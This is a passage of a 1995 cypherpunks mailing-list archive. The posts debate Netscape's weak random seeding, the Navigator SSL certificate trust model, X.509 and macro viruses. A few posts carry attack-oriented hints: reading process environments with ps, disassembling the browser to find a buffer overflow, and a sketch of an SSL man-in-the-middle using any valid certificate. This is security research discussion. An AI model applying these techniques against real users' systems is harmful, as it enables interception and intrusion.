   Security buffs concede that the recent round of security
   glitches found in several pieces of software, including a
   virus found in Microsoft Corp.'s Word program and security
   problems at Amefica Online Inc., has shaken confidence in
   electronic commerce. But they say the publicity brings to
   light problems that will ultimately make software more
   secure. Richard Lethin, a graduate student at
   Massachusettes Institute of Technology who participates in
   the Cypherpunk discussion, said: "This technology for
   electronic commerce is ultimately going to be real
   important, but there might be some hiccups at the start."

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Mon, 25 Sep 95 10:05:33 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <445j6k$h03@tera.mcom.com>
Message-ID: <199509251359.JAA21321@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jeff Weinstein wrote:
| 
|   More on the RNG stuff.  On Unix systems we look for ~/.pgp/randseed.bin,
| and feed it through the RNG hash.  On Unix and PC systems we feed the
| environment through the hash, so that would be a good place for a
| concerned user to put some random stuff of their own.

On a SunOS (or any BSD) box ps -e will get you environment variables.

ps -eaxuw
USER       PID %CPU %MEM   SZ  RSS TT STAT START  TIME COMMAND
root        53  0.0  0.0   68    0 ?  IW   Sep 19  0:02 portmap HOME=/
PATH=/bin:/usr/bin:/usr/etc:/usr/ucb
root        68  0.0  0.0   16    0 ?  I    Sep 19  0:00  (biod)
root        58  0.0  0.0   40    0 ?  IW   Sep 19  0:00 keyserv HOME=/
PATH=/bin:/usr/bin:/usr/etc:/usr/ucb


Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Mon, 25 Sep 95 10:05:14 PDT
To: cypherpunks@toad.com
Subject: RSA/Cylink arbitration agreement on-line
Message-ID: <199509251414.HAA29497@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


[I haven't seen this mentioned yet on the list...]

Cylink has been kind enough to put a copy of the arbitration panel's
decision on their web page.  Cylink's home page is www.cylink.com.  The
URL for the actual agreement is:

	http://www.cylink.com/arbtrn_1.html

Spin doctors aside, it doesn't look like either company gained much over
the other.  I'm not an attorney, but the way I read the agreement RSAREF
can continue to be used without violating the Stanford patents.  RSA DSI
cannot *sublicense* the Stanford patents to third parties, but can *sell
code* that practices the methods claimed in the Stanford patents.  That
code can then be incorporated into other products, which is exactly what
PGP 2.6.2 does (it's linked against a copy of the RSAREF library, which
is covered by the RSAREF license agreement).

					--bal






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Mon, 25 Sep 95 10:37:25 PDT
To: sameer <tcmay@got.net (Timothy C. May)
Subject: Re: Persistent Services Needed
Message-ID: <v02110102ac8c96b652cf@[204.179.132.9]>
MIME-Version: 1.0
Content-Type: text/plain


One way to establish persistent services is to use the DNS for indirection:
register a name for a service (or a set of services), which then point to
servers of those services by a DNS name. If the service needs to move
(hosts, net connections, etc), the only thing that changes is the DNS zone
file and the references to the service through the name stay exactly the
same. Hell, if your service requires no state information or can have
replicated data (e.g. DNS, FTP, WWW), you can use "round robin" techniques
with very low DNS RR TTL's to spread the service load over a bunch of
widely distributed hosts.

The NetBSD gang understand this principle: netbsd.org has several servers
all over the place:

E-mail to netbsd.org is handled at MIT.
www.netbsd.org is served up by WWU.EDU
ftp.netbsd.org is at CMU.

Perhaps Eric Hughes can be prevailed upon to permit "privacy.net" to be
used in this manner.

Erik Fair






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 25 Sep 95 10:46:18 PDT
To: cypherpunks@toad.com
Subject: Netscape as vehicle for cypherpunk agenda/the cypherpunk bully pulpit
Message-ID: <199509251741.KAA04656@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I was thinking recently how the events of the past week or so
have turned me into a sort of a Netscape advocate. Granted, there are
bugs in Netscape, and there probably will be more bugs uncovered
(someone needs to write an exploit if they want themself & Ray to get
a T-shirt btw), but Netscape is interested in fixing problems and the
new 2.0 is doing encrypted email, probably with a really nice
interface (Haven't seen it yet, of course) and they are working to
make the 128-bit version downloadable. (The 128bit version is
available overseas already anyway, I hear.)

	The really big sticking point I see, however, is the
certification authorities. There is a single point of failure here and
that is at Verisign. This becomes a large problem I think if the en
rypted email that Netscape does requires personal x509 certificates (I
read that Versign is issuing those for $9/each.) This is a problem
because for one thing I don't think Versign will want to issue certs
to psudonyms, and Netscape may not talk encrypted email to
non-certified people. (I am not sure)

	The solution to this, of course, is to allow Navigator to
accept alternate certification hierarchies, so we can setup a
Cypherpunks cert agency or a c2.org cert agency, which -will- sign
nym's keys, etc. The question exists though, as to whether or not
Netscape will allow for alternate agencies in Navigator.

	I haven't seen any mention of this feature in 2.0, so if the
feature exists in 2.0, then great! Otherwise, unless Netscape is going
to allow for alternte cert agencies on a specific timescale, I think
we have to do something about it in order to force the issue.

	Along the same lines of what happened recently-- because of
the exposed hole and the pressure put on Netscape, management was
finally willing to let some of the code be available for public
review. If something happened to show how relying on a single point of
failure such as Verisign was bad and resulted in much press &
publicity, then perhaps Netscape management would be convinced to
allow for alternate cert hierarchies..

	Some sort of hack which demonstrates this would be great. I am
feeling uncreative and can't think of anything effective short of
stealing Verisign's private key, but that would be pretty damn tough.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Mon, 25 Sep 95 10:46:32 PDT
To: rsalz@osf.org
Subject: Re: Defense against a class of programming bugs
Message-ID: <9509251742.AA21506@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> >Unfortunately, strdup is not posix compliant.  If you want to use
> >it and maintain portability, you'll have to write your own.
> 
> Er, you're kidding, right?  drand48 isn't in Posix either, for example.
> Someone who runs on Motif and Mac has strdup as the least of their
> worries.  But just in case it's stopping anyone:
> 	char *strdup(const char *x) { char *p;
> 	    return (p = malloc(strlen(x) + 1)) ? strcpy(p, x) : 0;
> 	}

Nah, I'm not kidding...I have to write code that runs on LOTS of platforms
including macs, pcs, and lots of variants of Unix...I assume there's a
lot of others that do as well...you have to make money where you can, and
even with free software given out to the net, you want to make it portable
as a matter of pride.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Mon, 25 Sep 95 09:56:22 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Decompiling Netscape
In-Reply-To: <199509221732.NAA17523@clark.net>
Message-ID: <9509251604.AA28123@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    From: Ray Cromwell <rjc@clark.net>
    Date: Fri, 22 Sep 1995 13:32:57 -0400 (EDT)

       Anyone want to lend me a hand in finding and disassembling the
    routine responsible for the buffer overflow in Netscape? Or atleast
    tell me how you did it. (I hope it wasn't done by single stepping thru 
    functions in GDB) I missed the whole Netscape RNG decompilation
    thread. You could win a T-shirt for your help!

Under Unix, you can use objdump, e. g.

 % objdump -d netscape

 netscape:     file format a.out-sunos-big

 No symbols in "netscape".
 Disassembly of section .text:
 00002020 clr  %fp
 00002024 ld  [ %sp + 0x40 ], %o0
 00002028 add  0x44, %sp, %o1
 0000202c sll  %o0, 2, %o2
 00002030 add  4, %o2, %o2
 00002034 add  %o1, %o2, %o2
 . . .

This should work wherever other GNU utilities work.  objdump is part
of GNU binutils.

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Caldwell" <jcaldwel@iquest.net>
Date: Tue, 26 Sep 95 22:17:27 PDT
To: cypherpunks@toad.com
Subject: Re: Yet Another Alarmist TV Show About Child Molesters on the Ne
Message-ID: <m0sxorl-00032TC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


On 25 Sep 95 at 0:06, Hroller Anonymous Remailer wrote:

It's called the Hegelian Diclectic(sp?) first postulated by William
Hegel (an ass) in Germany approx the 1600's as a method for social change
when none could otherwise be achieved.

> And the trashing will continue.  It is the classic scenario.
> Feed the media negative press clips about the entity you wish
> to discredit (here, the Net), e.g.:
> 1.  All those pedophiles out to lure your children;
> 2.  Big coverage on catching some of those pedophiles;
> 3.  First page coverage on breaking Netscape's code with the
>     headlines that your sensitive information such as your
>     credit card numbers, etc. can be retrieved (ignoring that
>     the reason was to show Netscape's poorly structered code
>     would allow this and, therefore, preventing it before it
>     could happen);
> 4.  Expect cryptology to crop up in the Oklahoma bombing trial.
>     There already has been articles of those involved having
>     allegedly used that *damned* Net to correspond.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 25 Sep 95 12:28:47 PDT
To: cypherpunks@toad.com
Subject: PM's Netscape rant
Message-ID: <199509251924.MAA05096@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I thoroughly enjoyed PM's vituperative, venemous, and vitriolic
Netscape rant. it just wouldn't be the cypherpunks list without 
the pit bull of the internet nipping at everyone's heels here
and slaying any unwarranted peace!! however I haven't seen any 
well-deserved rebuttals however, so..

I'm again going to be a netscape apologist and say, GEEZ, PM, 
will you take it easy, and untangle your underwear knots?

as has been pointed out numerous times, the encryption in the Netscape
code is designed to handle credit card number transport, *not*
actual cash transport. its really silly to have more security
present than is available than the weakest link. it would be like
worrying about a fence around the white house when one is giving
open tours to the public every day!!

PM is rather secretive about the systems he is working on, but
I suspect they are stock systems that must be highly secure because
they actually involve *transfer* of cash, and *large*amounts* of it,
in a *time-critical* environment, with *large corporate clients*.  these
are all inappropriate criteria to judge Netscape by.  in the Netscape 
scenario, the software is *not* transfering cash itself, *not* transferring 
large amounts of it, and *not* in a time critical application, and *not*
geared toward large corporations, but instead individual users. 
it is relying on another infrastructure (credit cards) for the actual 
transaction mechanisms. 

as has been pointed out numerous times, the whole
credit card apparatus is somewhat based on "security through obscurity", 
i.e. the obscurity of a credit card number, and it doesn't make a whole
lot of sense to try to make this more "secure". this is a problem for
credit card companies to fix (I agree it is a horrible problem, that costs
us billions, and should have been fixed a long time ago) .. but holding
credit card *using* companies responsible for this deficiency 
doesn't make sense. they are not the enemy!! they would surely seize the
most secure mechanism available, if there were alternatives.

the distinction is subtle, but I think a relevant one: is
the software itself transfering cash, or building on another system
that does so? hopefully in the latter case, the requirements for a
successful implementation are not so difficult to achieve (so that
even fresh-out-of-college CS students can call the functions to
do so, and perhaps code packages are written such that the user
is protected from their own naivete, or what PM would call stupidity
or incompetence).

--

PM gives some excellent techniques for improving code security (some
of these may not be exactly what he proposed):

1. hiring experts
2. code reviews
3. restrictions of who can work on what code (security clearance)
4. heavy testing
5. antagonistic attacks (i.e. hiring someone trying to crack the code that
others have written)
6. open review of key code

however, put all these things together and you get a company apparatus
a bit more like the NSA than a commercial company. I agree that all
these precaution are relevant for banking and stock transaction software
transferring millions of dollars.  but holding a joe-schmoe GUI and 
Web company responsible for this kind of paranoid oversight is really 
impossible and unrealistic and *unnecessary*.

there will be some companies that specialize in creating the 
*secure*infrastructure* for communications transactions. other companies
will just *latch on* to this existing infrastructure. hopefully the
requirements for *latching on* will not be too difficult, otherwise we
are all in trouble!! 
 
now, admittedly, it would be ideal if the netscape code was highly
secure, but again, I just don't think it is in the best interests of
this company to become security paranoid to the degrees that I have
listed above, and the extreme degrees that people here are ranting about. 
rather they should try to blend in with other companies
who specialize in cryptographic security. the latter companies should
as much as possible provide foolproof modules. they should take care
of all functions that have a potential for problem, such as random
number generation, key exchange, etc.  they should try to provide
a minimum of training where the code is not foolproof.

many have been making the point that one cannot judge the security of
a package based simply on analyzing key modules. I actually don't think this 
has been proven in general and completely resolved yet. I can imagine 
modules that communication with software such that the module 
itself is a "secure environment" in general, and
it is almost impossible to misuse the software itself. (for example,
the software might never store the actual keys of transactions itself, 
this being handled by a secure module, making it impossible to 
accidentally reveal them).

some day we might actually see "secure module support" built into a 
microprocessor. in many ways the microprocessors that guard against
illegal memory accesses and illegal function calls are in a sense
providing a kind of cryptographic security. and people who study
secure OSes generally eventually conclude that for ultimate security,
you almost have to work from the ground up, starting with memory,
microprocessors, and network hardware.

--

so my general point is that PM's rant, while lots of fun to read..

>you @#$%^&* whippersnappers!! you don't have a @#$%^&* clue about
>REAL code!! us old timers were writing code as secure and impenetrable
>as granite bricks, impregnable as a frigid victorian gandmother,
>before you were a twinkle in your mama's eye!! learn some
>sufficent grovelling skills for your superiors or you will
>not only be fired from your JOB but be excommunicated from the
>entire INDUSTRY, perhaps even tarred, feathered, drawn, quartered, and
>hung from your neck in the nearest tree!!! your employer will throw
>you to the wolves, your customers will spit on your flayed carcass,
>your family will look upon your shrivelled remains with shame,  the
>vultures will vomit your undigestable eviscerated entrails,
>and the world immediately explode, if you have a 
>SINGLE BUFFER OVERFLOW *anywhere* in your code!!

(ahem) this is not appropriate in the context of Netscape's aims, unless they
want to become financial transaction experts more in line with banking
expertise. netscape is more a "bring cyberspace to the masses" company,
not "bring secure transactions to cyberspace". it's just because so
few companies are successfully doing the latter, that netscape is forced
to implement some "key" aspects of it to support the former. but I suspect
they may ease out of the cryptographic security business in the long run,
delegating it to other companies' plug-in-packages.

furthermore, cyberspace is growing gradually. the way we get to really
incredible secure transactions is through a growing process, an evolution
in which mistakes are made at different levels, and which in the beginning
the software is not much more than a toy that looks pretty and has the
fewest moving parts and most simplistic design imaginable. 

I fully believe that some day a company in cyberspace will exist
that satisfies PM's and all other cypherpunk's most erotic dreams 
about secure transactions. however that day is years away and it
will take a long time to reach it. and I doubt that it will be the
same company that is playing around with GUI's for the end user and
hiring college programming hot-shots and Java geeks.  IMHO netscape 
is probably not going to be the company that will try to bring the
*lowlevel infrastructure* for cash, judging by the current winds,
although that could change. they will definitely help guide its
progress and be interacting with the companies that do, however.

when the big Secure Transactions Inc.  company is invented for
cyberspace, *then* the kinds of absolutely uncompromising  standards that PM
embodies will be in place. but again, we cannot expect the companies
of today to embody that ideology and atmosphere for a few years yet.

the cypherpunks play a very valuable role in finding these "growing
pain" mistakes of beginning companies such as Netscape,
but we are not really serving our own best interests or the 
harmonious growth of cyberspace by vilifying/ embarrassing/ 
browbeating/ humiliating companies or their employees over their security
problems, at least if they are clearly responsive to far less ammunition.
keep in mind that NSA unbreakable security is *just*not*appropriate* in
every situation, and in fact "weak" encryption does have legitimate 
uses (i.e. in a world where people routinely lock their keys in their
cars). (although I agree, in general one should always try to design a 
system to be as secure as possible.)

(oops, I used the term "we" in that paragraph, a grave cypherpunk sin.. 
my humble apologies; @#$%^&* cryptoanarchist vocabulary)
 
that all said, nevertheless, I do enjoy PM's periodic displays of 
undigestable bile eruptions at least as much as one of the other 
infamous amusing crackpots circulating in this corner of cyberspace..
(but geez, PM, were you raised by a pack of wild wolves or what?)

p.s. to TCM: why do you continually find my login name abbreviation so 
fascinating??? my apologies to anyone if I am missing some kind of 
inside joke here, I'm a little dense at times <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 25 Sep 95 12:53:39 PDT
To: "David J. Bianco" <bianco@itribe.net>
Subject: Re: SSL Man-in-the-middle
In-Reply-To: <199509251247.IAA27297@gatekeeper.itribe.net>
Message-ID: <Pine.SOL.3.91.950925124443.359B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


I can confirm that, at least up to 1.2, netscape navigator does not do any 
validation beyond checking the signer of the certificate. 

Exactly - the trust model used in Navigator 1.1N requires you to trust 
every single owner of a valid certificate. Getting hold of any key is 
vastly easier than having to obtain a specific key; in the worst case, 
you just buy your own - SSL exchanges are repudiable, and a few simple 
tricks can make sure you cerificiate doesn't show up in the "Document 
Information" dialog box. Or, since there are is CRLing, accidentaly lose 
you private key, notify verisni and get a revocation. 

To detect the attack without using either a modified client, or a nice
proxy that checks for you, you must do packet-tracing on all SSL
connections, regenerate the exchange, and then review each exchange to
look for suspicious certificates. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David_A Wagner <daw@CS.Berkeley.EDU>
Date: Mon, 25 Sep 95 12:58:06 PDT
To: vznuri@netcom.com
Subject: Re: netscape bug
Message-ID: <199509251957.MAA15095@quito.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509201855.LAA17261@netcom16.netcom.com> you write:
> 
> none of the articles mention that the cracker must have login access
> to the computer that the random numbers are generated on. is this true?
> does the code require knowledge of the PID etc. that can only be obtained
> by a login to the system that the netscape session is running on?
> 

No, the time, pid, and ppid often leak to a remote adversary too.
The attack probably requires a bit more sophistication when the
cracker doesn't have login access, but I believe it's still possible.

See my recent post to sci.crypt for some comments from Ian & I
about this.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David_A Wagner <daw@CS.Berkeley.EDU>
Date: Mon, 25 Sep 95 13:32:16 PDT
To: cwe@Csli.Stanford.EDU
Subject: Re: Exchange random numbers (was: Re: netscape's response)
Message-ID: <199509252031.NAA15134@quito.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509211852.LAA22259@Csli.Stanford.EDU> you write:
> 
> | If I only ever give out a hash of my seed, and only ever *add* any received
> | info to my seed (and stir it in well), how can anyone find out anything?
> | (Apart from hash weaknesses.)
> 
> Giving out contribution: 
>      MD5(select_bits(my_seed, start_bit, stop_bit)) -> remote
> Taking in contribution : 
>      my_seed = my_seed XOR 
>      ((select_low_bits(remote_contrib, contrib_width) << contrib_area)
> 

People seem to think this kind of thing is obviously safe.  I'm not yet
convinced.

By xoring in a quantity *chosen by your adversary*, you're essentially
allowing related-key attacks on your stream cipher.  (Your PRNG is just
a stream cipher, keyed with my_seed.)

Noone knows how secure most ciphers are against related-key attacks:
related-key attacks are known to be very powerful (often more powerful
than any other type); but very little research on this topic is available.
You're treading on unknown ground.



There's the also a small error in your specific algorithm.  Let
	 n = stop_bit - start_bit;
presumably n is much less than the length of your seed.  Then a brute-force
search over n bits will recover n bits of the seed -- this is a much faster
cryptanalysis than a brute force over all bits of the seed.  This can
probably be fixed by something like
	MD5(select_bits(MD5(my_seed))) -> remote,
but the related-key uncertainties still remain.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Mon, 25 Sep 95 14:25:25 PDT
To: wb8foz@nrk.com
Subject: Re: "random" number seeds vs. Netscape
Message-ID: <ac8ccae902021004990a@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 12:29 PM 9/24/95, Ed Carp [khijol SysAdmin] wrote:
....
>I learned the hard way - keep the transmitters away from a reverse-biased
>doide acting as a noise generator.  Only until I examined the output did
>I realize it wasn't random.  I fixed it, though, by looking at the output
>and testing its randomness.
....
Very interesting. I wouldn't be too sure that a transmitted signal at a
single frequency is the only signal that an opponent could use to bias your
random numbers. How do you "test for randomness". I think that signal to
noise arguments, phrased in terms of entropy, can protect you against
unknown and unwanted signal. (Ironically you want a very low signal to
noise ratio!) Perhaps you merely take n/(S/N) bits from the HRNG when you
need n bits and run them thru MD5. Here S is the signal strength of the
maximum plausible unwanted signal, and N is the noise of the diode.

I encourage both diode theorists and information theorists to quibble with
the above formula!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian Gorka" <gorkab@sanchez.com>
Date: Mon, 25 Sep 95 10:52:40 PDT
To: cypherpunks@toad.com
Subject: List of US representitives
Message-ID: <00996ED487C83F20.00003C77@sanchez.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone posted a list of US reps awhile back...  Can someone forward me a copy? 

Thanks.
Brian Gorka


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAy/oSvwAAAEEAKM8kn6GkjFgbWUHBXPOtiJuCrhEgMc0Hk8WqERu0aW9bfKN
JLdl9iY0g+fDg9HgP6fX7MQx5svwsx4m9Dc7Uynwnm6Na6EKvjozRW7OR5zjf4Fi
YYqQ45ZmuU8lokphPGpnl4IZTfC1eWGTAC3G8KmA34x8HQdSCUqS5+bitIhFAAUR
tCNCcmlhbiBSLiBHb3JrYSA8Z29ya2FiQHNhbmNoZXouY29tPg==
=S8nb
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 25 Sep 95 14:01:53 PDT
To: sameer@c2.org
Subject: Re: Netscape as vehicle for cypherpunk agenda/the cypherpunk bully pulpit
In-Reply-To: <199509251741.KAA04656@infinity.c2.org>
Message-ID: <199509252101.OAA09395@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


I agree with Sameer's points here. Netscape carries with it the
potential of revitalizing the cypherpunks agenda, but also, in the
worst case, making it irrelevant. What happens, I think, depends on
what we do.

On the plus side, Netscape 2.0 will, without a doubt, be the first
usable mail tool to incorporate real encryption. It may accomplish,
almost overnight, the long-held goal of making a nontrivial fraction
of Internet email secure.

Another potentially big win is the Java language. It seems to me that
it will be quite plausible to code up real crypto applications in this
language. Once coded, these applications will run on every important
platform in the universe, and can be accessible by the click of a
mouse. Perl-RSA was a sign of what's possible in the non-C world. One
caveat is the slowdown from the interpreted code (roughly a factor of
25). The best way to look at this is as a challenge, to use clever
coding tricks and intelligent architectures, including caching. The
speed of Java implementations will inevitably improve - in fact, I
might just be doing my PhD thesis on memory management in Java.

One potential downside, as Sameer points out, is the X.509
certification hierarchy. This ancient beast has the potential to
defeat many of the cypherpunk aims, most especially the possiblity of
anonymous communication. However, that's not a foregone conclusion.
The most important thing to be doing right now is to _understand_
what's happening. Over the next couple of weeks, I'll be reading the
S/MIME and X.509 documentation, poring over reference code, and (of
course) playing with Netscape 2.0 myself. We're much more likely to
get our agenda implemented if we are armed with a good understanding.
There are lots of ways around X.509 - maybe we can work our way around
it, maybe we can adapt it to our needs, maybe we can come up with
something better and get it replaced. Whatever the case may be, we
should not give up hope.

Netscape is one manifestation of the ancient Chinese curse: may we
live in interesting times!

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sun, 24 Sep 95 21:06:43 PDT
To: vince@offshore.com.ai (Vincent Cate)
Subject: Re: real randomness for netscape - user clicking mouse
In-Reply-To: <Pine.3.89.9509211743.A459-0100000@offshore.com.ai>
Message-ID: <199509250402.OAA17312@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Vincent Cate <vince@offshore.com.ai>
  and cypherpunks@toad.com
  and jsw@neon.netscape.com
 
Vincent Cate <vince@offshore.com.ai> wrote:
[about getting entropy from mouse]
> You must get the random bits from something that nobody else could watch. 
...
> other hand, an attacker would have to have broken the machine to get the
> mouse info
...

Not really... Have you ever been on an X system with host-based
security (as opposed to xauth)? Anyone who has user login rights
to the machine you're on (*) can just telnet in and open windows
on your screen, blink the leds on your keyboard, install
fonts, confine the mouse to a given screen area, etc.

I understand that normally they can get a copy of every
X event you get (and filter them), but I've never tried...

(*) More accurately, any of the machines you can run X programs from.

Mouse events might not be as secret as we would like...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGYpmyxV6mvvBgf5AQFkxwQAif9RTKJRW9IhZxd1zp4kmEdHbf4IkdMX
OgEhgeMf6d9+iyTnwZJjR/YvSOsonueKHxR+gmQWotf5r9Y7FmLCFLxw8U0F5AF3
wUjQtqnTlWEU5jt57bn3KZFs5EFqdKKAgj9J7qLlflKd2Bm0mAXK4S8mWIP2U7xu
Sl5UbU3KcqE=
=zlW+
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Mon, 25 Sep 95 14:43:02 PDT
To: "David J. Bianco" <bianco@itribe.net>
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <4454nu$da8@tera.mcom.com>
Message-ID: <3067219B.167E@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


> Will you put a picture up on http://www.netscape.com/ someone does find
> a problem?

If you look at my home page (see below), you can see a picture from about
25 years ago. If I have to shave my head, I will post before and after
pictures.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Mon, 25 Sep 95 12:02:32 PDT
To: dmandl@panix.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <Pine.SUN.3.91.950922154119.7388A-100000@panix.com>
Message-ID: <Pine.SUN.3.91.950925144312.26957E-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Sep 1995 dmandl@panix.com wrote:

> On Fri, 22 Sep 1995, Adam Shostack wrote:
> 
> > Perry E. Metzger wrote:
> > 
> > | I don't believe the Sun Java stuff would suffer from it, although I
> > | fear Java a great deal.
> > 
> > 	I keep hearing this thought.  Isn't Win95 with its
> > 'executables in email' much more dangerous than Java, which at least
> > tries to address security?
> 
> Is that the new MS-Word you're thinking of?  I hear that it lets you
> imbed macros containing executable code in documents.  That's got to
> be one of the most dangerous ideas ever cooked up.

Agreed; but it's present, not just in Word (every version since 2.0, as 
far as I can tell, in fact, since they all let you make system calls...), 
but in Microsoft Network, Microsoft Access, Microsoft Excel... I believe 
PowerPoint and Publisher are exempt from this bug, if only because the 
current versions have no macro languages...

One of the penalties that modern software (at least for Windows) imposes 
is the ability to create massive viri, simply by allowing system calls to 
be executed from macros (if this was not the case, OLE technology 
wouldn't work, and interoperation between Windows programs can't occur, 
thereby crippling the system through bad design regardless of which 
alternative was chosen)

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Phillips <paulp@CERF.NET>
Date: Mon, 25 Sep 95 14:51:32 PDT
To: cypherpunks@toad.com
Subject: Re: Golden Coy Freeh
In-Reply-To: <199509251253.IAA07006@pipe4.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.950925144659.21198A-100000@nic.cerf.net>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 25 Sep 1995, John Young wrote:

>    The New York Times, January 25, 1995, p. D5.
> 
>    The F.B.I. Sting Operation on Child Pornography Raises
>    Questions About Cryptography
> 
>    By Peter H. Lewis
>
>    [snip]
> 
>    If the head of the F.B.I. acknowledged that his agency was
>    powerless to crack a cryptography program like Pretty Good
>    Privacy, the stampede for that software on the Internet
>    would make the run on Windows 95 look puny.

That's a bizarre and naive statement.  Is there anyone that thinks the 
spread of strong crypto has been less than rapid only because people are 
afraid it won't protect them against the government? Um, sorry, no.

--
Paul Phillips                                 | "Click _here_ if you do not
<URL:mailto:paulp@cerf.net>                   |  have a graphical browser"
<URL:http://www.primus.com/staff/paulp/>      |  -- Canter and Siegel, on
<URL:pots://+1-619-558-3789/is/paul/there?>   |  their short-lived web site




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Mon, 25 Sep 95 11:57:48 PDT
To: Herb Sutter <herbs@interlog.com>
Subject: Re: Notes security question
In-Reply-To: <199509230133.VAA05532@gold.interlog.com>
Message-ID: <Pine.SUN.3.91.950925145104.26957F-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Sep 1995, Herb Sutter wrote:

> While I'm at it, here's a question I've been wondering about recently: Why
> is it I've never heard of any security issues with Lotus Notes?  Are there
> no known weaknesses?  Or did existing weaknesses just not get much press
> because Notes isn't a commercially visible consumer product like Netscape?

Perhaps the Notes pricing scheme is sooo outrageous (by the standards of 
a student like myself, and probably most others, if it's still anything 
like it was at the 1.0 release) that mostpeople have had zero opportunity 
to examine the program, let alone really have time to play with it?

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Mon, 25 Sep 95 12:03:16 PDT
